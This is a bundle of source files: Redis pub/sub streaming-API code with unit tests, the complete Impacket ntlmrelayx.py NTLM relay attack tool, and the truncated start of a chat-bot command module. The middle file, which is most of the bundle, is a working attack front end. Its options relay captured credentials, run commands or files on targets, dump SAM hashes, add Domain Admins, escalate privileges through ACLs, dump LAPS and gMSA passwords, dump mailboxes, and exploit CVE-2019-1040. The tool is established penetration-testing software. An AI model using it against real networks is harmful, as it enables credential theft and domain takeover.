#K Call a helper function that handles the fetching of an identifier for the client
#L If the request is not a user, keyword, or location filter, return a '404 not found' error
#M Otherwise, call a helper function that actually handles the filtering
#END
# <start id="get-identifier"/>
def parse_identifier(handler):
handler.identifier = None #A
handler.query = {} #A
if '?' in handler.path: #B
handler.path, _, query = handler.path.partition('?') #C
handler.query = urlparse.parse_qs(query) #D
identifier = handler.query.get('identifier') or [None] #E
handler.identifier = identifier[0] #F
# <end id="get-identifier"/>
#A Set the identifier and query arguments to be placeholder values
#B If there were query arguments as part of the request, process them
#C Extract the query portion from the path, and update the path
#D Parse the query
#E Fetch the list of query arguments with the name 'identifier'
#F Use the first identifier passed
#END
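# Example of the parsing above (sketch, not from the book): for a request to
# '/statuses/sample.json?identifier=abc&percent=10' the handler ends up with
#   handler.path       == '/statuses/sample.json'
#   handler.query      == {'identifier': ['abc'], 'percent': ['10']}
#   handler.identifier == 'abc'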
# <start id="stream-to-client"/>
FILTERS = ('track', 'filter', 'location') #A
def process_filters(handler):
id = handler.identifier
if not id: #B
return handler.send_error(401, "identifier missing")#B
method = handler.path.rsplit('/')[-1].split('.')[0] #C
name = None
args = None
if method == 'filter': #D
data = cgi.FieldStorage( #E
fp=handler.rfile, #E
headers=handler.headers, #E
environ={'REQUEST_METHOD':'POST', #E
'CONTENT_TYPE':handler.headers['Content-Type'],#E
})
for name in data: #F
if name in FILTERS: #F
args = data.getfirst(name).lower().split(',') #F
break #F
if not args: #G
return handler.send_error(401, "no filter provided")#G
else:
args = handler.query #M
handler.send_response(200) #H
handler.send_header('Transfer-Encoding', 'chunked') #H
handler.end_headers()
quit = [False] #N
for item in filter_content(id, method, name, args, quit): #I
try:
handler.wfile.write('%X\r\n%s\r\n'%(len(item), item)) #J
except socket.error: #K
quit[0] = True #K
if not quit[0]:
handler.wfile.write('0\r\n\r\n') #L
# <end id="stream-to-client"/>
#A Keep a listing of filters that need arguments
#B Return an error if an identifier was not provided by the client
#C Fetch the method, should be one of 'sample' or 'filter'
#D If this is a filtering method, we need to fetch the arguments
#E Parse the POST request to discover the type and arguments to the filter
#F Fetch any of the filters provided by the client request
#G If there were no filters specified, return an error
#M For sample requests, pass the query arguments as the 'args'
#H Finally return a response to the client, informing them that they will be receiving a streaming response
#N Use a Python list as a holder for a pass-by-reference variable, which will allow us to tell the content filter to stop receiving messages
#I Iterate over the results of the filter
#J Send the pre-encoded response to the client using the chunked encoding
#K If sending to the client caused an error, then we need to tell the subscriber to unsubscribe and shut down
#L Send the "end of chunks" message to the client if we haven't already disconnected
#END
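# Sketch of the chunked wire format used above (editor's note): each item is framed as
# '<hex length>\r\n<payload>\r\n', and a zero-length chunk terminates the stream. For
# example, '%X\r\n%s\r\n' % (len('{"id": 1}'), '{"id": 1}') yields '9\r\n{"id": 1}\r\n',
# and the final write of '0\r\n\r\n' tells the client that no more chunks will follow.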
_create_status = create_status
# <start id="create-message-streaming"/>
def create_status(conn, uid, message, **data):
pipeline = conn.pipeline(True)
pipeline.hget('user:%s'%uid, 'login')
pipeline.incr('status:id:')
login, id = pipeline.execute()
if not login:
return None
data.update({
'message': message,
'posted': time.time(),
'id': id,
'uid': uid,
'login': login,
})
pipeline.hmset('status:%s'%id, data)
pipeline.hincrby('user:%s'%uid, 'posts')
pipeline.publish('streaming:status:', json.dumps(data)) #A
pipeline.execute()
return id
# <end id="create-message-streaming"/>
#A The added line to send a message to streaming filters
#END
_delete_status = delete_status
# <start id="delete-message-streaming"/>
def delete_status(conn, uid, status_id):
key = 'status:%s'%status_id
lock = acquire_lock_with_timeout(conn, key, 1)
if not lock:
return None
if conn.hget(key, 'uid') != str(uid):
release_lock(conn, key, lock)
return None
pipeline = conn.pipeline(True)
status = conn.hgetall(key) #A
status['deleted'] = True #B
pipeline.publish('streaming:status:', json.dumps(status)) #C
pipeline.delete(key)
pipeline.zrem('profile:%s'%uid, status_id)
pipeline.zrem('home:%s'%uid, status_id)
pipeline.hincrby('user:%s'%uid, 'posts', -1)
pipeline.execute()
release_lock(conn, key, lock)
return True
# <end id="delete-message-streaming"/>
#A Fetch the status message so that streaming filters can perform the same filters to determine whether the deletion should be passed to the client
#B Mark the status message as deleted
#C Publish the deleted status message to the stream
#END
# <start id="message-subscription"/>
@redis_connection('social-network') #A
def filter_content(conn, id, method, name, args, quit):
match = create_filters(id, method, name, args) #B
pubsub = conn.pubsub() #C
pubsub.subscribe(['streaming:status:']) #C
for item in pubsub.listen(): #D
message = item['data'] #E
decoded = json.loads(message) #E
if match(decoded): #F
if decoded.get('deleted'): #G
yield json.dumps({ #G
'id': decoded['id'], 'deleted': True}) #G
else:
yield message #H
if quit[0]: #I
break #I
pubsub.reset() #J
# <end id="message-subscription"/>
#A Use our automatic connection decorator from chapter 5
#B Create the filter that will determine whether a message should be sent to the client
#C Prepare the subscription
#D Receive messages from the subscription
#E Get the status message information from the subscription structure
#F Check if the status message matched the filter
#G For deleted messages, send a special 'deleted' placeholder for the message
#H For matched status messages that are not deleted, send the message itself
#I If the web server no longer has a connection to the client, stop filtering messages
#J Reset the Redis connection to ensure that the Redis server clears its outgoing buffers if this wasn't fast enough
#END
# <start id="create-filters"/>
def create_filters(id, method, name, args):
if method == 'sample': #A
return SampleFilter(id, args) #A
elif name == 'track': #B
return TrackFilter(args) #B
elif name == 'follow': #B
return FollowFilter(args) #B
elif name == 'location': #B
return LocationFilter(args) #B
raise Exception("Unknown filter") #C
# <end id="create-filters"/>
#A For the 'sample' method, we don't need to worry about names, just the arguments
#B For the 'filter' method, we actually worry about which of the filters we want to apply, so return the specific filters for them
#C If no filter matches, then raise an exception
#END
# <start id="sample-filter"/>
def SampleFilter(id, args): #A
percent = int(args.get('percent', ['10'])[0], 10) #B
ids = range(100) #C
shuffler = random.Random(id) #C
shuffler.shuffle(ids) #C
keep = set(ids[:max(percent, 1)]) #D
def check(status): #E
return (status['id'] % 100) in keep #F
return check
# <end id="sample-filter"/>
#A We define a filter called "SampleFilter", which is created by passing 'id' and 'args' parameters
#B The 'args' parameter is actually a dictionary, based on the parameters passed as part of the GET request
#C We use the 'id' parameter to randomly choose a subset of ids, the count of which is determined by the 'percent' argument passed
#D We will use a Python set to allow us to quickly determine whether a status message matches our criteria
#E The nested 'check' function is returned and later called like a function to test each status message against the filter
#F To filter status messages, we fetch the status id, find its value modulo 100, and return whether it is in the status ids that we want to accept
#END
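# Example (sketch, not part of the original listing): a 10 percent sample keyed off the
# client's identifier, so the same identifier always keeps the same 10 buckets of status ids.
#   check = SampleFilter('some-client-id', {'percent': ['10']})
#   check({'id': 1234})  # True only if 1234 % 100 falls in this client's kept ids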
# <start id="track-filter"/>
def TrackFilter(list_of_strings):
groups = [] #A
for group in list_of_strings: #A
group = set(group.lower().split()) #A
if group:
groups.append(group) #B
def check(status):
message_words = set(status['message'].lower().split()) #C
for group in groups: #D
if len(group & message_words) == len(group): #E
return True #E
return False
return check
# <end id="track-filter"/>
#A The filter should have been provided with a list of word groups, and the filter matches if a message has all of the words in any of the groups
#B We will only keep groups that have at least 1 word
#C We are going to split words in the message on whitespace
#D Then we are going to iterate over all of the groups
#E If all of the words in any of the groups match, we will accept the message with this filter
#END
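# Example (sketch, not part of the original listing): each comma-separated argument
# becomes a word group, and a status matches when every word of any one group appears
# in the message.
#   check = TrackFilter(['redis pubsub', 'streaming'])
#   check({'message': 'loving Redis PubSub so far'})  # True: 'redis' and 'pubsub' both present
#   check({'message': 'just plain redis'})            # False: no group matches completely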
# <start id="follow-filter"/>
def FollowFilter(names):
nset = set() #A
for name in names: #B
nset.add('@' + name.lower().lstrip('@')) #B
def check(status):
message_words = set(status['message'].lower().split()) #C
message_words.add('@' + status['login'].lower()) #C
return message_words & nset #D
return check
# <end id="follow-filter"/>
#A We are going to try to match login names against posters and messages
#B Make all of the names consistently stored as '@username'
#C Construct a set of words from the message and the poster's name
#D Consider the message a match if any of the usernames provided match any of the whitespace-separated words in the message
#END
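# Example (sketch, not part of the original listing): names are normalized to '@name',
# and a status matches when the poster or any @-mention in the message is one of them.
#   check = FollowFilter(['alice', '@bob'])
#   check({'login': 'alice', 'message': 'morning'})    # truthy: posted by @alice
#   check({'login': 'carol', 'message': 'ping @bob'})  # truthy: '@bob' appears in the message
#   check({'login': 'carol', 'message': 'nothing'})    # falsy: empty intersection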
# <start id="location-filter"/>
def LocationFilter(list_of_boxes):
boxes = [] #A
for start in xrange(0, len(list_of_boxes)-3, 4): #A
boxes.append(map(float, list_of_boxes[start:start+4])) #A
def check(status):
location = status.get('location') #B
if not location: #C
return False #C
lat, lon = map(float, location.split(',')) #D
for box in boxes: #E
if (box[1] <= lat <= box[3] and #F
box[0] <= lon <= box[2]): #F
return True #F
return False
return check
# <end id="location-filter"/>
#A We are going to create a set of boxes that define the regions that should return messages
#B Try to fetch 'location' data from a status message
#C If the message has no location information, then it can't be inside the boxes
#D Otherwise, extract the latitude and longitude of the location
#E To match one of the boxes, we need to iterate over all boxes
#F If the message status location is within the required latitude and longitude range, then the status message matches the filter
#END
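# Example (sketch, not part of the original listing): arguments come in groups of four
# as west,south,east,north (southwest longitude/latitude, then northeast
# longitude/latitude), and the status 'location' field is parsed as 'lat,lon'.
#   check = LocationFilter(['-122.75', '36.8', '-121.75', '37.8'])  # roughly the SF bay area
#   check({'location': '37.78,-122.41'})  # True: inside the box
#   check({'location': '51.51,-0.13'})    # False: outside the box
#   check({'message': 'no location'})     # False: no 'location' field at all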
_filter_content = filter_content
def filter_content(identifier, method, name, args, quit):
print "got:", identifier, method, name, args
for i in xrange(10):
yield json.dumps({'id':i})
if quit[0]:
break
time.sleep(.1)
'''
# <start id="start-http-server"/>
if __name__ == '__main__': #A
server = StreamingAPIServer( #B
('localhost', 8080), StreamingAPIRequestHandler)#B
print 'Starting server, use <Ctrl-C> to stop' #C
server.serve_forever() #D
# <end id="start-http-server"/>
#A Run the below block of code if this module is being run from the command line
#B Create an instance of the streaming API server listening on localhost port 8080, and use the StreamingAPIRequestHandler to process requests
#C Print an informational line
#D Run the server until someone kills it
#END
'''
class TestCh08(unittest.TestCase):
def setUp(self):
self.conn = redis.Redis(db=15)
self.conn.flushdb()
def tearDown(self):
self.conn.flushdb()
def test_create_user_and_status(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User2'), None)
self.assertEquals(create_status(self.conn, 1, "This is a new status message"), 1)
self.assertEquals(self.conn.hget('user:1', 'posts'), '1')
def test_follow_unfollow_user(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertEquals(self.conn.zcard('followers:2'), 1)
self.assertEquals(self.conn.zcard('followers:1'), 0)
self.assertEquals(self.conn.zcard('following:1'), 1)
self.assertEquals(self.conn.zcard('following:2'), 0)
self.assertEquals(self.conn.hget('user:1', 'following'), '1')
self.assertEquals(self.conn.hget('user:2', 'following'), '0')
self.assertEquals(self.conn.hget('user:1', 'followers'), '0')
self.assertEquals(self.conn.hget('user:2', 'followers'), '1')
self.assertEquals(unfollow_user(self.conn, 2, 1), None)
self.assertEquals(unfollow_user(self.conn, 1, 2), True)
self.assertEquals(self.conn.zcard('followers:2'), 0)
self.assertEquals(self.conn.zcard('followers:1'), 0)
self.assertEquals(self.conn.zcard('following:1'), 0)
self.assertEquals(self.conn.zcard('following:2'), 0)
self.assertEquals(self.conn.hget('user:1', 'following'), '0')
self.assertEquals(self.conn.hget('user:2', 'following'), '0')
self.assertEquals(self.conn.hget('user:1', 'followers'), '0')
self.assertEquals(self.conn.hget('user:2', 'followers'), '0')
def test_syndicate_status(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertEquals(self.conn.zcard('followers:2'), 1)
self.assertEquals(self.conn.hget('user:1', 'following'), '1')
self.assertEquals(post_status(self.conn, 2, 'this is some message content'), 1)
self.assertEquals(len(get_status_messages(self.conn, 1)), 1)
for i in xrange(3, 11):
self.assertEquals(create_user(self.conn, 'TestUser%s'%i, 'Test User%s'%i), i)
follow_user(self.conn, i, 2)
global POSTS_PER_PASS
POSTS_PER_PASS = 5
self.assertEquals(post_status(self.conn, 2, 'this is some other message content'), 2)
time.sleep(.1)
self.assertEquals(len(get_status_messages(self.conn, 9)), 2)
self.assertTrue(unfollow_user(self.conn, 1, 2))
self.assertEquals(len(get_status_messages(self.conn, 1)), 0)
def test_refill_timeline(self):
self.assertEquals(create_user(self.conn, 'TestUser', 'Test User'), 1)
self.assertEquals(create_user(self.conn, 'TestUser2', 'Test User2'), 2)
self.assertEquals(create_user(self.conn, 'TestUser3', 'Test User3'), 3)
self.assertTrue(follow_user(self.conn, 1, 2))
self.assertTrue(follow_user(self.conn, 1, 3))
global HOME_TIMELINE_SIZE
HOME_TIMELINE_SIZE = 5
for i in xrange(10):
self.assertTrue(post_status(self.conn, 2, 'message'))
self.assertTrue(post_status(self.conn, 3, 'message'))
time.sleep(.05)
self.assertEquals(len(get_status_messages(self.conn, 1)), 5)
self.assertTrue(unfollow_user(self.conn, 1, 2))
self.assertTrue(len(get_status_messages(self.conn, 1)) < 5)
refill_timeline(self.conn, 'following:1', 'home:1')
messages = get_status_messages(self.conn, 1)
self.assertEquals(len(messages), 5)
for msg in messages:
self.assertEquals(msg['uid'], '3')
delete_status(self.conn, '3', messages[-1]['id'])
self.assertEquals(len(get_status_messages(self.conn, 1)), 4)
self.assertEquals(self.conn.zcard('home:1'), 5)
clean_timelines(self.conn, '3', messages[-1]['id'])
self.assertEquals(self.conn.zcard('home:1'), 4)
if __name__ == '__main__':
unittest.main()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Generic NTLM Relay Module
#
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It should work with any LM compatibility level. The only way
# to stop this attack is to enforce SPN checks and/or signing on the server.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so that the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
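# Example invocations (illustrative only; see the argument parser below for the full
# option list and defaults):
#   ntlmrelayx.py -t 192.168.1.10 -smb2support
#   ntlmrelayx.py -tf targets.txt -socks -of netntlm
#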
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
c.setWebDAVOptions(options.serve_image)
c.setIsADCSAttack(options.adcs)
c.setADCSOptions(options.template)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
elif server is WCFRelayServer:
c.setListeningPort(options.wcf_port)
elif server is RAWRelayServer:
c.setListeningPort(options.raw_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, tuple(RELAY_SERVERS)):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help="Target to relay the credentials to, "
"can be an IP, hostname or URL like domain\\username@host:port (domain\\username and port "
"are optional, and don't forget to escape the '\\'). If unspecified, it will relay back "
"to the client')")
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true', help='Launch an smbclient or LDAP console instead '
'of executing a command after a successful relay. This console will listen locally on a '
'tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_argument_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
serversoptions.add_argument('--no-raw-server', action='store_true', help='Disables the RAW server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389) # ADWS
parser.add_argument('--raw-port', type=int, help='Port to listen on raw server', default=6666)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
'SMB Server (16 hex bytes long. eg: 1122334455667788)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store', type=int, default=1, help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file. (default=1)')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
parser.add_argument('--serve-image', action='store',help='local path of the image that will be returned to clients')
parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
' in the same directory). For RPC no output will be provided.')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#RPC arguments
rpcoptions = parser.add_argument_group("RPC client options")
rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
help='Use this credential to authenticate to SMB (low-privilege account)')
rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTPS options
httpoptions = parser.add_argument_group("HTTP options")
httpoptions.add_argument('-machine-account', action='store', required=False,
help='Domain machine account to use when interacting with the domain to grab a session key for '
'signing, format is domain/machine_name')
httpoptions.add_argument('-machine-hashes', action="store", metavar="LMHASH:NTHASH",
help='Domain machine hashes, format is LMHASH:NTHASH')
httpoptions.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
httpoptions.add_argument('-remove-target', action='store_true', default=False,
help='Try to remove the target in the challenge message (in case CVE-2019-1019 patch is not installed)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
ldapoptions.add_argument('--sid', action='store_true', required=False, help='Use a SID to delegate access rather than an account name')
ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
# AD CS options
adcsoptions = parser.add_argument_group("AD CS attack options")
adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, default="Machine", help='AD CS template. If you are attacking Domain Controller or other windows server machine, default value should be suitable.')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.rpc_use_smb and not options.auth_smb:
logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
sys.exit(1)
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS, randomize=options.random)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if not options.no_wcf_server:
RELAY_SERVERS.append(WCFRelayServer)
if not options.no_raw_server:
RELAY_SERVERS.append(RAWRelayServer)
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
__init__.py
|
# coding=utf-8
from collections import defaultdict
from logging import getLogger
import traceback
import threading
import re
from nekbot import settings
from nekbot.core.commands.argparse import ArgParse
from nekbot.core.commands.doc import Doc
from nekbot.core.exceptions import PrintableException
from nekbot.utils.decorators import optional_args
from nekbot.utils.strings import split_arguments, highlight_occurrence, limit_context, in_str_no_case
__author__ = 'nekmo'
logger = getLogger('nekbot.core.commands')
class Command(object):
symbol = True
_doc = None
def __init__(self, name=None, function=None, symbol=None, *args, **kwargs):
self.name = name
self.function = function
self.symbol = symbol if symbol is not None else self.symbol
self.argparse = self.get_argparse(args, kwargs, function)
self._args = args
        self._kwargs = kwargs  # TODO: the order is important here
def get_argparse(self, arg_types, kwargs, function):
argparse = ArgParse()
